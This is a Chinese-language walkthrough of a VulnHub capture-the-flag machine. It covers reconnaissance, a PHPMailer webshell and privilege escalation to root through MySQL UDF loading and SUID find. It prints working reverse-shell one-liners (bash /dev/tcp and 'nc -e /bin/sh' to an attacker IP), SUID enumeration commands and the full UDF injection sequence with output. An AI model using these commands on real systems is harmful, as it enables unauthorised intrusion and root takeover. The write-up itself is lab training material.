vulhub4下载地址自己搜索。
信息搜集
扫描靶机ip,netdiscover -i eth0,找到靶机ip为192.168.136.140
root@w0rk:~# dirb http://192.168.79.132/
root@w0rk:~# searchsploit phpmail
获取webshell权限,依靠phpmail 写文件导致命令执行,详细移步文末“参考3”,不再重复说明。下面进行提权。经过多番尝试,实用udf成功提权。写的不好,还望各位师傅指点。
tips
反弹shell [交互式 体验更好]
bash -i >& /dev/tcp/192.168.146.129/2333 0>&1
切换为交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
SUID 提权
什么是suid?suid全称是Set owner User ID up on execution。这是Linux给可执行文件的一个属性。通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。需要注意的是,只有程序的所有者是0号或其他super user,同时拥有suid权限,才可以提权。
可提权uid查找:
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search) # find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null
suid -- find提权
【find的-exec可以执行命令,当find以root用户运行时导致可被提权】
和find类型的nmap,vim
UDF提权
攻击机kali,locate mysqludf 查找提权所需要的so文件,sqlmap的so文件需要不过 sqlmap 中 自带这些动态链接库为了防止被误杀都经过编码处理过,不能被直接使用。不过可以利用 sqlmap 自带的解码工具cloak.py 来解码使用,cloak.py 的位置为:/extra/cloak/cloak.py ,解码方法如下https://www.sqlsec.com/2020/11/mysql.html#toc-heading-21
使用metasploit目录下的udf文件。
目标主机执行:
进行udf提权命令
mysql> use mysql;
use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed
mysql> create table foo(line blob); create table foo(line blob); Query OK, 0 rows affected (0.03 sec)
mysql> insert into foo values(load_file('/var/www/html/lib_mysqludf_sys_64.so')); <es(load_file('/var/www/html/lib_mysqludf_sys_64.so')); Query OK, 1 row affected (0.01 sec)
查找mysql plugin目录
mysql> show variables like '%plugin%';
show variables like '%plugin%'; +---------------+------------------------+ | Variable_name | Value | +---------------+------------------------+ | plugin_dir | /usr/lib/mysql/plugin/ | +---------------+------------------------+ 1 row in set (0.00 sec) mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so'; select * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so'; Query OK, 1 row affected (0.01 sec)
糟糕,出错了。
试试另外一个udf so文件。
32位udf.so不行。继续尝试https://www.cnblogs.com/zzjdbk/p/12989830.html
mysql> use mysql use mysql Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> create function sys_exec returns string soname 'udf.so'; create function sys_exec returns string soname 'udf.so'; Query OK, 0 rows affected (0.01 sec)mysql> select @@plugin_dir; select @@plugin_dir; +------------------------+ | @@plugin_dir | +------------------------+ | /usr/lib/mysql/plugin/ | +------------------------+ 1 row in set (0.00 sec) 验证: mysql> select * from mysql.func where name = 'sys_exec'; select * from mysql.func where name = 'sys_exec'; +----------+-----+--------+----------+ | name | ret | dl | type | +----------+-----+--------+----------+ | sys_exec | 0 | udf.so | function | +----------+-----+--------+----------+ 1 row in set (0.00 sec) mysql>
换一个函数sys_eval;
成功提权
emmm貌似无法反弹shell.
那就使用suid find提权吧。
实战发现此命令较为好用nc -e /bin/sh 192.168.146.129 2333
mysql> select * from mysql.func; select * from mysql.func; +----------+-----+--------+----------+ | name | ret | dl | type | +----------+-----+--------+----------+ | sys_exec | 0 | udf.so | function | | sys_eval | 0 | udf.so | function | +----------+-----+--------+----------+ 2 rows in set (0.00 sec)
mysql> select sys_eval("whoami"); select sys_eval("whoami"); +--------------------+ | sys_eval("whoami") | +--------------------+ | root | +--------------------+ 1 row in set (0.00 sec)
mysql> select sys_eval("nc -e /bin/sh IP PORT"); select sys_eval("nc -e /bin/sh IP PORT");
总结:
1.切换为交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
2.mysql udf提权总结:
use mysql create table foo(line blob);
insert into foo values(load_file(‘/var/www/html/raptor_udf2.so’));
select * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so';
create function do_system returns integer soname ‘udf.so’;
sys_eval sys_exec integer/string select sys_eval("whoami");
3.总结
参考:
- MySQL 漏洞利用与提权https://www.sqlsec.com/2020/11/mysql.html#toc-heading-27
- MySQL提权之udf提权(获得webshell的情况) - My_Dreams - 博客园https://www.cnblogs.com/zzjdbk/p/12989830.html
- raven靶机实战(linux-udf提权)-vuluhub系列(四)https://www.cnblogs.com/PANDA-Mosen/p/13189038.html